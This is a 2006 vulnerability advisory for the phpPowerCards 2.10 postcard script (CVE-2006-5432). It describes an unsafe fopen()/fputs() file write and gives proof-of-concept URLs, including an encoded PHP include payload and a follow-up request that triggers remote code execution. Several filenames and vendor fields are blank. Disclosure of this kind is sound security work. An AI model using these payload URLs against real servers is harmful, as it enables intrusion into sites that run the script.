PHPPowerCards 2.10 - '' Remote Code Execution

Related Vulnerabilities: CVE-2006-5432  
Publish Date: 18 Oct 2006
Author: nuffsaid

+ phpPowerCards 2.10 ( Remote Code Execution Vulnerability
+ Affected Software .: phpPowerCards 2.10
+ Vendor ............:
+ Download ..........:
+ Description .......: "phpPowerCards is a powerfull PHP based postcard script."
+ Class .............: Remote Code Execution
+ Risk ..............: High (Remote Code Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]>
+ Details:
+ phpPowerCards db/ does not initialize the $file variable before using it in the
+ fopen() function on line 10, after $file is opened it then writes several variables which
+ are also uninitialized to $file using the fputs() function. Assuming register_globals = on,
+ we can initialize these variables in a query string and then write anything to a file we
+ desire on the target box that's running phpPowerCards.
+ Vulnerable Code:
+ db/, line(s) 10: $fp = fopen("$file","a");
+ db/, line(s) 23: fputs($fp, $email[to]. "¦¦" .$email[from]. "¦¦" .$name[to]. "¦¦" .$name[from]. "¦¦" .$picture. "¦¦" .$comment. "¦¦" .$sessionID. "\n");
+ Proof of Concept:
+ http://[target]/[path]/db/[file]&check=0&email[to]=[evil code]
+ http://[target]/[path]/db/[file]&check=0&comment=[evil code]
+ ... same thing repeated for each variable in the second argument of fputs() on line 23
+ -> http://[target]/[path]/db/[to]=+%3C%3Fphp+include%28%24evil_include%29%3B+%3F%3E+
+ -> http://[target]/[path]/evilfile.php?evil_include=

# [2006-10-18]